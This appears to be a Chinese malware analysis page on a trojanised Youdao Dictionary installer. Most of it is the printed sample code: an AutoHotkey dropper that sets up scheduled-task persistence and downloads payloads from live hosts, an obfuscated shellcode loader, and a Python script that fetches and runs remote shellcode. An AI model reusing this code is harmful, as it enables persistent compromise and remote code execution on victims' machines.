有道字典

DeeLMind大约 3 分钟

有道字典

收集样本

  1. 下载样本youdaoFY.zip
https://www.google.com/search?q=%E6%9C%89%E9%81%93%E5%AD%97%E5%85%B8&newwindow=1&sca_esv=0ba29d23b081b3ca&sxsrf=ADLYWIL6zek9eGep9uTAH9WstdLJ4jt6mg%3A1717587588916&source=hp&ei=hE5gZuTkJpfe4-EPhKCJ2QM&iflsig=AL9hbdgAAAAAZmBclI18C9W_bFiwm22QJFOW9QeIbas-&ved=0ahUKEwjktt2wsMSGAxUX7zgGHQRQIjsQ4dUDCBc&uact=5&oq=%E6%9C%89%E9%81%93%E5%AD%97%E5%85%B8&gs_lp=Egdnd3Mtd2l6IgzmnInpgZPlrZflhbgyDRAAGIAEGLEDGIMBGAoyDRAAGIAEGLEDGIMBGAoyBxAAGIAEGAoyBxAAGIAEGAoyBxAAGIAEGAoyBxAAGIAEGAoyBxAAGIAEGAoyBxAAGIAEGAoyBxAAGIAEGAoyBxAAGIAEGApIi2JQAFjfTXAEeACQAQCYAZICoAH5GqoBBjAuMjIuMbgBA8gBAPgBAZgCF6AC9xfCAgQQIxgnwgIREC4YgAQYsQMY0QMYgwEYxwHCAgsQABiABBixAxiDAcICDhAuGIAEGLEDGIMBGIoFwgIIEAAYgAQYsQPCAgsQLhiABBixAxiDAcICChAjGIAEGCcYigXCAgUQABiABMICCxAuGIAEGMcBGK8BwgIJEAAYgAQYChgMwgIIEAAYgAQYogTCAgYQABgEGB7CAgYQABgeGA_CAgYQABgIGB7CAgQQABgewgIKEC4YChgqGAwYHsICCBAAGAoYDBgewgIGEAAYDRgewgIIEAAYDRgeGA_CAggQABgEGA0YHsICCBAAGAQYHhgPwgIIEAAYBBgIGB7CAggQABgIGA0YHsICDBAAGAQYCBgNGB4YD8ICChAAGAQYDRgeGA_CAgoQABgEGAgYHhgPwgIKEAAYBBgHGB4YD8ICBhAAGAcYHsICCBAAGAcYHhgPmAMAkgcGMy4xOC4yoAeOZA&sclient=gws-wiz#ip=1

er

er

简单分析

  1. 运行病毒文件

er

#NoTrayIcon 
#NoEnv 
#NoTrayIcon
#SingleInstance off
   try
   {
Run, *RunAs %comspec% /c start C:\ProgramData\AutoHotkey\YoudaoDictSetup.exe&schtasks /create /sc onlogon /tn AHK /rl highest /tr "C:\Users\Public\Music\Update\AutoHotkey\AutoHotkey.exe" /F&del C:\Users\Public\Music\Update\AutoHotkey\AutoHotkey.ahk&del C:\Users\Public\AutoHotkey\Run8.txt , , Hide
url := "https://sogou88.oss-cn-beijing.aliyuncs.com/py.zip"
localFile := "C:\Users\Public\Music\python\py.zip"
UrlDownloadToFile, %url%, %localFile%
url := "http://laicai168.com/qd.jpg"
localFile := "C:\Users\Public\Music\python\qd.jpg"
UrlDownloadToFile, %url%, %localFile%
url := "http://laicai168.com/qd.ahk"
localFile := "C:\Users\Public\Music\Update\AutoHotkey\AutoHotkey.ahk"
UrlDownloadToFile, %url%, %localFile%
RunWait, %comspec% /c powershell.exe -Command Expand-Archive -Path C:\Users\Public\Music\python\Py.zip -DestinationPath C:\Users\Public\Music\python , , Hide
randomString := ""
Lenght := rand(1,10) 
Loop, %Lenght%
{
    Random, char, 48, 122 
    If (char > 57 && char < 65) || (char > 90 && char < 97) 
        Continue
    randomString .= Chr(char) 
}
FileAppend, %randomString%, C:\Users\Public\Music\python\qd.jpg

rand(min, max) {
    Random, rand, min, max
    return rand
}
RunWait, %comspec% /c start C:\Users\Public\Music\python\pythonw.exe C:\Users\Public\Music\python\qd.jpg&del C:\Users\Public\Music\python\py.zip , , Hide
   }
; tUKF5GQ19
  1. http://laicai168.com/qd.ahk

;You can compile and set icons by using Ahk2Exe.exe

;If AutoHotkey.exe wants to change its name to abc.exe, Please modify Ahk=%A_ScriptDir%\abc.exe

 #NoEnv
 #NoTrayIcon
 #SingleInstance off
 SetBatchLines, -1
 if A_IsCompiled
 {
   Ahk=%A_ScriptDir%\AutoHotkey.exe
   FileInstall, AutoHotkey.exe, %Ahk%
 }
 else Ahk=

s=
s.="u3615544364u640425871u1678942631u2998343137u1434168171u24144"
...
s.="313546u1039906973u484215839u3522253212"

 Exec(s, Ahk)
 ExitApp

Exec(str, Ahk="", arg="") {
  static MyFunc, base, ScriptName:=%True%
  s:=RegExReplace(str,"\s"), StrReplace(s,"u","",size)
  VarSetCapacity(str,(size+1)*4,0), s:=SubStr(s,InStr(s,"u")+1)
  Loop, Parse, s, u
    NumPut(A_LoopField, str, (A_Index-1)*4, "uint")
  ;-----------------------------
  Ahk:=Ahk ? Ahk : A_IsCompiled
    ? A_ScriptDir "\AutoHotkey.exe" : A_AhkPath
  IfNotExist, %Ahk%
  {
    MsgBox, 4096, Error!, `n`nCan't Find: %Ahk% !`n`n
    return, 0
  }
  if !MyFunc
  {
    x32:="5557565381EC4C0100008B9C24680100008BBC246C01000"
    . "08BAC24700100008B433C01D88038500F85380500008078014"
    . "50F852E0500008B706085F60F84FF04000031C9837864010F9"
    . "2C119D283E210894C245083C2788B341001DE8B4E188974243"
    . "C8B562085C90F84E504000031C08D3413EB0B83C00139C10F8"
    . "4D30400008B1486813C134765745075E9817C1304726F63417"
    . "5DF8B74243C8D04430346240FB7008D048303461C8B3085F60"
    . "F84A0040000B86500000001DE891C2466894424688D442460C"
    . "744246057726974C74424646546696C89442404FFD683EC088"
    . "944243C8D442475891C24C7442475476C6F62C7442479616C4"
    . "16CC744247D6C6F630089442404FFD683EC08BA65650000894"
    . "424548D44246A6689542472891C24C744246A476C6F62C7442"
    . "46E616C4672C64424740089442404FFD683EC08B9734100008"
    . "94424488D84248D00000066898C2499000000891C24C784248"
    . "D00000043726561C784249100000074655072C784249500000"
    . "06F636573C684249B0000000089442404FFD683EC088944245"
    . "C8D8424BE000000891C24C78424BE00000043726561C78424C"
    . "200000074654E61C78424C60000006D656450C78424CA00000"
    . "069706541C68424CE0000000089442404FFD683EC088944245"
    . "88D8424CF000000891C24C78424CF000000436F6E6EC78424D"
    . "30000006563744EC78424D7000000616D6564C78424DB00000"
    . "050697065C68424DF0000000089442404FFD683EC088944244"
    . "08D842481000000891C24C7842481000000436C6F73C784248"
    . "50000006548616EC7842489000000646C650089442404FFD68"
    . "3EC088D5C24608944244CC744241000000000C744240800000"
    . "000897C2404895C240CC7042400000000FF54243C83EC14807"
    . "C2460000F85E50200008D34AD04000000C7042400000000897"
    . "4244489742404FF54245483EC0885C089C30F841703000031C"
    . "085ED7415908B148789148383C00139C575F38B44244483E80"
    . "4C7040300000000C784249C0000000B000000BA0B000000C78"
    . "424A00000000D000000C78424A40000001100000031C0C7842"
    . "4A800000013000000EB0C89C283E2038B94949C00000069D28"
    . "300000089C183E10301C283C00183F86489948C9C00000075D"
    . "831D285ED742D669089D183E10369848C9C000000830000000"
    . "1D089848C9C000000330493D1C083C00189049383C20139D57"
    . "5D58B8424640100008B742458C744241C00000000C74424180"
    . "0000000C744241400000000C744241000000000C744240CFF0"
    . "00000C744240800000000C744240402000000890424FFD683E"
    . "C2089C78B842464010000C744241C00000000C744241800000"
    . "000C744241400000000C744241000000000C744240CFF00000"
    . "0C744240800000000C744240402000000890424FFD683EC208"
    . "3FFFF89C60F849D01000083F8FF0F84940100008D8C24E0000"
    . "0008D94244001000089C8C7000000000083C00439C275F3837"
    . "C245001894C2420C744241C00000000C744241800000000C74"
    . "4241400000000C744241000000000C744240C00000000C7442"
    . "4080000000019C0C704240000000083E0E483C060898424E00"
    . "000008D8424AC000000894424248B84246001000089442404F"
    . "F54245C83EC2885C00F84DA0000008B6C244C8B8424AC00000"
    . "089042489E8FFD083EC048B8424B000000089042489E8FFD08"
    . "3EC04893C24C744240400000000FF54244083EC0889E8893C2"
    . "4FFD083EC04893424C744240400000000FF54244083EC088D4"
    . "42460895C2404893424C7442410000000008944240C8B44244"
    . "489442408FF54243C83EC1489E8893424FFD083EC04891C24F"
    . "F54244883EC0431C081C44C0100005B5E5F5DC21400C744245"
    . "001000000BA88000000E904FBFFFFB8FEFFFFFF81C44C01000"
    . "05B5E5F5DC2140081C44C010000B8FFFFFFFF5B5E5F5DC2140"
    . "0B8FDFFFFFFEBDA893C248B7C244C89F8FFD083EC0489F8893"
    . "424FFD083EC04891C24FF542448B8FAFFFFFF83EC04EBB1893"
    . "C248B7C244C89F8FFD083EC0489F8893424FFD083EC04891C2"
    . "4FF542448B8FBFFFFFF83EC04EB88B8FCFFFFFFEB8190"
    x64:="4157415641554154555756534881EC98010000B8FFFFFFF"
    . "F8BB4240002000048899424E8010000418B503C4D89C748898"
    . "C24E00100004D89CC4C01C2803A500F858C040000807A01450"
    . "F8582040000448B42604585C00F8489040000837A64014819C"
    . "031FF83E0104883C078837A6401400F92C7897C245C448B0C0"
    . "2B8FEFFFFFF4D01F9418B4918418B512085C90F843D0400003"
    . "1C04D8D0417EB100F1F40004883C00139C10F864B040000418"
    . "B148041813C174765745075E641817C1704726F634175DB418"
    . "B5124498D04470FB71410418B411C498D14978B3C0285FF0F8"
    . "41304000048B8577269746546696C488D6C24704C01FF48894"
    . "42470B8650000004C89F94889EA6689442478FFD74989C548B"
    . "8476C6F62616C416C488D9424900000004C89F948898424900"
    . "00000C78424980000006C6F6300FFD7BA656500004889C348B"
    . "8476C6F62616C467266899424880000004C89F9488D9424800"
    . "000004889842480000000C684248A00000000FFD7B97341000"
    . "0488944245048B8437265617465507266898C24BC000000488"
    . "D9424B00000004C89F948898424B0000000C78424B80000006"
    . "F636573C68424BE00000000FFD7488944246048B8437265617"
    . "4654E61488D9424D000000048898424D000000048B86D65645"
    . "0697065414C89F948898424D8000000C68424E000000000FFD"
    . "74989C648B8436F6E6E6563744E488D9424F00000004889842"
    . "4F000000048B8616D6564506970654C89F948898424F800000"
    . "0C684240001000000FFD7488944246848B8436C6F736548616"
    . "E488D9424A00000004C89F948898424A0000000C78424A8000"
    . "000646C6500FFD74531C031C94889C748C7442420000000004"
    . "989E94C89E241FFD5807C247000B8FDFFFFFF0F85490200008"
    . "D14B50400000031C94989D7FFD34885C04889C30F849202000"
    . "031C085F6741D0F1F840000000000418B14848914834883C00"
    . "139C677F189F048C1E002C7040300000000C78424C00000000"
    . "B000000BA0B000000C78424C40000000D000000C78424C8000"
    . "0001100000031C0C78424CC00000013000000EB0C89C283E20"
    . "38B9494C000000069D28300000089C183E10301C283C00183F"
    . "86489948CC000000075D831D285F6742E904889D183E103698"
    . "48CC00000008300000001D089848CC0000000330493D1C083C"
    . "0018904934883C20139D677D34531C041B9FF000000BA02000"
    . "000488B8C24E801000048C744243800000000C744243000000"
    . "000C744242800000000C74424200000000041FFD64889C6453"
    . "1C048C744243800000000C744243000000000C744242800000"
    . "00041B9FF000000C744242000000000BA02000000488B8C24E"
    . "801000041FFD64883FEFF4989C40F84380100004883F8FF0F8"
    . "42E010000488D8C2430010000488D9424900100004889C8669"
    . "0C700000000004883C0044839C275F1837C245C0148894C244"
    . "048C74424380000000048C744243000000000C744242800000"
    . "000C744242000000000488B9424E001000019C04531C94531C"
    . "083E0E431C983C06089842430010000488D842410010000488"
    . "9442448488B442460FFD085C00F8488000000488B8C2410010"
    . "000FFD7488B8C2418010000FFD74C8B74246831D24889F14C8"
    . "9F0FFD04889F1FFD731D24C89E14C89F0FFD04989E94589F84"
    . "889DA4C89E148C74424200000000041FFD54C89E1FFD74889D"
    . "9488B442450FFD031C04881C4980100005B5E5F5D415C415D4"
    . "15E415FC3B888000000C744245C01000000E981FBFFFFB8FEF"
    . "FFFFFEBD34889F1FFD74C89E1FFD74889D9488B442450FFD0B"
    . "8FAFFFFFFEBB84889F1FFD74C89E1FFD74889D9488B442450F"
    . "FD0B8FBFFFFFFEB9DB8FCFFFFFFEB969090909090"
    hex:=A_PtrSize=8 ? x64:x32
    VarSetCapacity(MyFunc, len:=StrLen(hex)//2)
    Loop, % len
      NumPut("0x" SubStr(hex,2*A_Index-1,2),MyFunc,A_Index-1,"uchar")
    DllCall("VirtualProtect","ptr",&MyFunc,"ptr",len,"uint",0x40,"ptr*",0)
    base:=DllCall("GetModuleHandle", "Str","Kernel32", "ptr")
    ScriptName:=ScriptName ? ScriptName : A_ScriptFullPath
  }
  Random, n, 1, 1000000
  pipe_name:="\\.\pipe\AHK" . A_TickCount . n
  cmdline="%Ahk%" "%pipe_name%" "%ScriptName%" %arg%
  DllCall(&MyFunc, "AStr",cmdline, "AStr",pipe_name
  , "ptr",base, "ptr",&str, "uint",size)
  return, 1
}
;
  1. http://laicai168.com/qd.jpg
import subprocess
import requests
import ctypes
import ctypes.wintypes
import time
import base64

# Execute the command without showing a window

# Rest of your code...

# Rest of your code...

# Define the shellcode execution function signature
ShellcodeFunction = ctypes.CFUNCTYPE(None)

def download_binary_file(url, delay=5):
    try:
        response = requests.get(url, timeout=5)
        if response.status_code == 200:
            return response.content
    except requests.exceptions.RequestException:
        print(f'Failed to load {url}, retrying in {delay} seconds...')
        time.sleep(delay)
    return None

def execute_shellcode(shellcode):
    if shellcode is None:
        print("No shellcode to execute.")
        return

    shellcode_size = len(shellcode)
    # Allocate executable memory
    exec_memory = ctypes.windll.kernel32.VirtualAlloc(
        None, shellcode_size, 0x3000, 0x04)  # PAGE_READWRITE : 0x04
    # Change the allocated memory page protection to PAGE_EXECUTE_READWRITE
    old_protect = ctypes.wintypes.DWORD()
    ctypes.windll.kernel32.VirtualProtect(
        exec_memory, shellcode_size, 0x40, ctypes.byref(old_protect))  # PAGE_EXECUTE_READWRITE : 0x40
    # Copy the shellcode to the executable memory
    ctypes.memmove(exec_memory, shellcode, shellcode_size)
    # Create a function pointer to the shellcode
    shellcode_func = ShellcodeFunction(exec_memory)
    # Call the function
    shellcode_func()
    # Free the allocated memory
    ctypes.windll.kernel32.VirtualFree(exec_memory, 0, 0x8000)

def main():
    encoded_url = "aHR0cDovL2NvbWMwbS5jb20vbGFpY2FpMTY4LmNvbS5iaW4="
    url = base64.b64decode(encoded_url).decode()
    while True:
        shellcode = download_binary_file(url)
        execute_shellcode(shellcode)

if __name__ == "__main__":
    main()

# 
上次编辑于:
贡献者: DeeLMind